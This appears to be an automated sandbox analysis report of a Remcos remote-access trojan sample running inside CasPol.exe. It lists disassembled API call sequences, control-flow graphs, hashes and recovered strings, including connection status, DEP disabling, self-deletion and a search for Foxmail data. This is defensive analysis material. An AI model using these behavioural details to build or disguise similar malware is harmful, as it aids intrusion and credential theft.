                                                                                                                                                                          • String ID: 5.2.0 Pro$override$pth_unenc$xtv
                                                                                                                                                                          • API String ID: 2281282204-3247355391
                                                                                                                                                                          • Opcode ID: dd022d37faf85c83f6d16c9c954fb50513bd165f4129af8d01f50529c9010c87
                                                                                                                                                                          • Instruction ID: 0454f1d730b8de97e77b6af0221289a353f5645d6d0bcfbcd4472c6607f37e61
                                                                                                                                                                          • Opcode Fuzzy Hash: dd022d37faf85c83f6d16c9c954fb50513bd165f4129af8d01f50529c9010c87
                                                                                                                                                                          • Instruction Fuzzy Hash: 7421E171B0420127D6087676885B6AE399A9B80708F50453FF409672D6FF7C8E0483AF
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                                                                                                                                                          • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                                                                                                                                                          • GetNativeSystemInfo.KERNEL32(?), ref: 00411DE0
                                                                                                                                                                          • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411E04
                                                                                                                                                                            • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E4B
                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E52
                                                                                                                                                                          • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F65
                                                                                                                                                                            • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                                                                                                                                            • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000), ref: 00412129
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3950776272-0
                                                                                                                                                                          • Opcode ID: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                                                                                                                          • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                                                                                                                                                          • Opcode Fuzzy Hash: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                                                                                                                          • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetComputerNameExW.KERNEL32(00000001,?,0000002B,h}v), ref: 0041B6BB
                                                                                                                                                                          • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Name$ComputerUser
                                                                                                                                                                          • String ID: h}v
                                                                                                                                                                          • API String ID: 4229901323-2591199288
                                                                                                                                                                          • Opcode ID: a649893464b8dc9f92fcf892b6f773fc4b962ecf36c796a43829c604b32fbd1e
                                                                                                                                                                          • Instruction ID: 96a0ba9ffe47efa01ac310f3847ceb2d7b3b0148e4494d8e74ae155582b6cc75
                                                                                                                                                                          • Opcode Fuzzy Hash: a649893464b8dc9f92fcf892b6f773fc4b962ecf36c796a43829c604b32fbd1e
                                                                                                                                                                          • Instruction Fuzzy Hash: 9E014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E888BA8
                                                                                                                                                                          APIs
                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,0076F4A0), ref: 004338DA
                                                                                                                                                                          • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1815803762-0
                                                                                                                                                                          • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                                                                                                          • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                                                                                                                                                          • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                                                                                                          • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AB37), ref: 00448A16
                                                                                                                                                                          Strings
                                                                                                                                                                          • GetSystemTimePreciseAsFileTime, xrefs: 004489F2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Time$FileSystem
                                                                                                                                                                          • String ID: GetSystemTimePreciseAsFileTime
                                                                                                                                                                          • API String ID: 2086374402-595813830
                                                                                                                                                                          • Opcode ID: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
                                                                                                                                                                          • Instruction ID: bacba389ed7ed90706db716b221aab5ed2509560655679cc0f09f15d90276a03
                                                                                                                                                                          • Opcode Fuzzy Hash: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
                                                                                                                                                                          • Instruction Fuzzy Hash: 79E0E531A81618FBD7116B25EC02E7EBB50DB08B02B10027FFC05A7292EE754D14D6DE
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 00434BDD
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                          • Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                                                                                                                                          • Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
                                                                                                                                                                          • Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                                                                                                                                          • Instruction Fuzzy Hash:

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 5 40ea00-40ea82 call 41cbe1 GetModuleFileNameW call 40f3fe call 4020f6 * 2 call 41beac call 40fb52 call 401e8d call 43fd50 22 40ea84-40eac9 call 40fbee call 401e65 call 401fab call 410f72 call 40fb9f call 40f3eb 5->22 23 40eace-40eb96 call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->23 49 40ef2d-40ef3e call 401fd8 22->49 69 40eb98-40ebe3 call 406c59 call 401fe2 call 401fd8 call 401fab call 413584 23->69 70 40ebe9-40ec04 call 401e65 call 40b9f8 23->70 69->70 101 40f38a-40f3a5 call 401fab call 4139e4 call 4124b0 69->101 80 40ec06-40ec25 call 401fab call 413584 70->80 81 40ec3e-40ec45 call 40d0a4 70->81 80->81 97 40ec27-40ec3d call 401fab call 4139e4 80->97 89 40ec47-40ec49 81->89 90 40ec4e-40ec55 81->90 93 40ef2c 89->93 94 40ec57 90->94 95 40ec59-40ec65 call 41b354 90->95 93->49 94->95 105 40ec67-40ec69 95->105 106 40ec6e-40ec72 95->106 97->81 126 40f3aa-40f3db call 41bcef call 401f04 call 413a5e call 401f09 * 2 101->126 105->106 108 40ecb1-40ecc4 call 401e65 call 401fab 106->108 109 40ec74 call 407751 106->109 127 40ecc6 call 407790 108->127 128 40eccb-40ed53 call 401e65 call 41bcef call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->128 117 40ec79-40ec7b 109->117 120 40ec87-40ec9a call 401e65 call 401fab 117->120 121 40ec7d-40ec82 call 407773 call 40729b 117->121 120->108 142 40ec9c-40eca2 120->142 121->120 157 40f3e0-40f3ea call 40dd7d call 414f65 126->157 127->128 177 40ed55-40ed6e call 401e65 call 401fab call 43bb56 128->177 178 40edbb-40edbf 128->178 142->108 143 40eca4-40ecaa 142->143 143->108 146 40ecac call 40729b 143->146 146->108 177->178 205 40ed70-40edb6 call 401e65 call 401fab call 401e65 call 401fab call 40da6f call 401f13 call 401f09 177->205 180 40ef41-40efa1 call 436f10 call 40247c call 401fab * 2 call 413733 call 409092 178->180 181 40edc5-40edcc 178->181 236 40efa6-40effa call 401e65 call 401fab call 402093 call 401fab call 4137aa call 401e65 call 401fab call 43bb2c 180->236 183 40ee4a-40ee54 call 409092 181->183 184 40edce-40ee48 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40ce34 181->184 191 40ee59-40ee7d call 40247c call 434829 183->191 184->191 212 40ee8c 191->212 213 40ee7f-40ee8a call 436f10 191->213 205->178 218 40ee8e-40eed9 call 401f04 call 43f859 call 40247c call 401fab call 40247c call 401fab call 413982 212->218 213->218 273 40eede-40ef03 call 434832 call 401e65 call 40b9f8 218->273 287 40f017-40f019 236->287 288 40effc 236->288 273->236 286 40ef09-40ef28 call 401e65 call 41bcef call 40f4af 273->286 286->236 306 40ef2a 286->306 289 40f01b-40f01d 287->289 290 40f01f 287->290 292 40effe-40f015 call 41ce2c CreateThread 288->292 289->292 293 40f025-40f101 call 402093 * 2 call 41b580 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409e1f call 401e65 call 401fab 290->293 292->293 344 40f103-40f13a call 43455e call 401e65 call 401fab CreateThread 293->344 345 40f13c 293->345 306->93 346 40f13e-40f156 call 401e65 call 401fab 344->346 345->346 357 40f194-40f1a7 call 401e65 call 401fab 346->357 358 40f158-40f18f call 43455e call 401e65 call 401fab CreateThread 346->358 368 40f207-40f21a call 401e65 call 401fab 357->368 369 40f1a9-40f202 call 401e65 call 401fab call 401e65 call 401fab call 40da23 call 401f13 call 401f09 CreateThread 357->369 358->357 379 40f255-40f279 call 41b69e call 401f13 call 401f09 368->379 380 40f21c-40f250 call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 40c19d 368->380 369->368 402 40f27b-40f27c SetProcessDEPPolicy 379->402 403 40f27e-40f291 CreateThread 379->403 380->379 402->403 404 40f293-40f29d CreateThread 403->404 405 40f29f-40f2a6 403->405 404->405 408 40f2b4-40f2bb 405->408 409 40f2a8-40f2b2 CreateThread 405->409 412 40f2c9 408->412 413 40f2bd-40f2c0 408->413 409->408 418 40f2ce-40f302 call 402093 call 4052fd call 402093 call 41b580 call 401fd8 412->418 415 40f2c2-40f2c7 413->415 416 40f307-40f31a call 401fab call 41353a 413->416 415->418 425 40f31f-40f322 416->425 418->416 425->157 427 40f328-40f368 call 41bcef call 401f04 call 413656 call 401f09 call 401f04 425->427 443 40f381-40f386 DeleteFileW 427->443 444 40f388 443->444 445 40f36a-40f36d 443->445 444->126 445->126 446 40f36f-40f37c Sleep call 401f04 445->446 446->443
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                                                                                                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                                                                                                                                                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                                                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                                                                                                                                                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                                                                                                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                                                                                                                                                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                                                                                                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                                                                                                                                                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                                                                                                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                                                                                                                                                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                                                                                                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                                                                                                                                                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                                                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                                                                                                                                                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                                                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                                                                                                                                                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                                                                                                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                                                                                                                                                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                                                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                                                                                                                                                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                                                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                                                                                                                                                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                                                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                                                                                                                                                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                                                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                                                                                                                                                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                                                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                                                                                                                                                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 0040EA29
                                                                                                                                                                            • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                                                                                          • String ID: (TG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Exe$Exe$Inj$Remcos Agent initialized$Rmc-N6HMP4$Software\$User$`SG$del$del$exepath$h]v$hev$h}v$licence$license_code.txt$tMG$xtv
                                                                                                                                                                          • API String ID: 2830904901-214815415
                                                                                                                                                                          • Opcode ID: 07b2b0c7241cf00acb74f7775d1551c562902b351f0098e9289c0005d90a0865
                                                                                                                                                                          • Instruction ID: 744eeac4272eceb7f63ef51a6efbfa797c3f505d1bd04c543663c5f487e0f2b9
                                                                                                                                                                          • Opcode Fuzzy Hash: 07b2b0c7241cf00acb74f7775d1551c562902b351f0098e9289c0005d90a0865
                                                                                                                                                                          • Instruction Fuzzy Hash: 7D32D860B043416BDA14B7729C57B6E26994F80748F40483FB9467F2E3EEBD8D45839E

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 494 414f65-414fad call 4020df call 41b944 call 4020df call 401e65 call 401fab call 43bb2c 507 414fbc-415008 call 402093 call 401e65 call 4020f6 call 41beac call 40489e call 401e65 call 40b9f8 494->507 508 414faf-414fb6 Sleep 494->508 523 41500a-415079 call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 507->523 524 41507c-415117 call 402093 call 401e65 call 4020f6 call 41beac call 401e65 * 2 call 406c59 call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 507->524 508->507 523->524 577 415127-41512e 524->577 578 415119-415125 524->578 579 415133-4151c5 call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414f24 577->579 578->579 606 415210-41521e call 40482d 579->606 607 4151c7-41520b WSAGetLastError call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 579->607 613 415220-415246 call 402093 * 2 call 41b580 606->613 614 41524b-415260 call 404f51 call 4048c8 606->614 630 415ade-415af0 call 404e26 call 4021fa 607->630 613->630 629 415266-4153b9 call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 4 call 41b871 call 4145f8 call 409097 call 441ed1 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 413733 614->629 614->630 694 4153bb-4153c8 call 405aa6 629->694 695 4153cd-4153f4 call 401fab call 4135e1 629->695 642 415af2-415b12 call 401e65 call 401fab call 43bb2c Sleep 630->642 643 415b18-415b20 call 401e8d 630->643 642->643 643->524 694->695 701 4153f6-4153f8 695->701 702 4153fb-4154c0 call 40417e call 40ddc4 call 41bcd3 call 41bdaf call 41bc1f call 401e65 GetTickCount call 41bc1f call 41bb77 call 41bc1f * 2 call 41bb27 695->702 701->702 725 4154c5-415a51 call 41bdaf * 5 call 40f90c call 41bdaf call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 call 404aa1 call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 702->725 948 415a53-415a5a 725->948 949 415a65-415a6c 725->949 948->949 950 415a5c-415a5e 948->950 951 415a78-415aaa call 405a6b call 402093 * 2 call 41b580 949->951 952 415a6e-415a73 call 40b08c 949->952 950->949 963 415aac-415ab8 CreateThread 951->963 964 415abe-415ad9 call 401fd8 * 2 call 401f09 951->964 952->951 963->964 964->630
                                                                                                                                                                          APIs
                                                                                                                                                                          • Sleep.KERNEL32(00000000,00000029,00475300,h}v,00000000), ref: 00414FB6
                                                                                                                                                                          • WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
                                                                                                                                                                          • Sleep.KERNEL32(00000000,00000002), ref: 00415B12
                                                                                                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleep$ErrorLastLocalTime
                                                                                                                                                                          • String ID: | $%I64u$5.2.0 Pro$@ev$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$Rmc-N6HMP4$TLS Off$TLS On $`SG$h]v$hlight$h}v$name$tMG$xtv
                                                                                                                                                                          • API String ID: 524882891-3837567690
                                                                                                                                                                          • Opcode ID: 7bf696abd08d2381de43c76793c389733c40d927b3f9d1472677c8aefb4019fd
                                                                                                                                                                          • Instruction ID: d8c825886b0a0d8326cbfb5c9d4cc5050fd80dde9ad4bcb2ea62c87b00a1b781
                                                                                                                                                                          • Opcode Fuzzy Hash: 7bf696abd08d2381de43c76793c389733c40d927b3f9d1472677c8aefb4019fd
                                                                                                                                                                          • Instruction Fuzzy Hash: 03526C31A001155ACB18F732DD96AFEB3769F90348F5044BFE40A761E2EF781E858A9D

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                                                                                                                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                                                            • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?), ref: 10001151
                                                                                                                                                                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                                                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                                                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                                                            • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                                                            • Part of subcall function 100010F1: FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                                                                                                                                                            • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 100014C5
                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 100014E0
                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                                          • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                                          • API String ID: 672098462-2938083778
                                                                                                                                                                          • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                                                          • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                                                                                                                                          • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                                                          • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
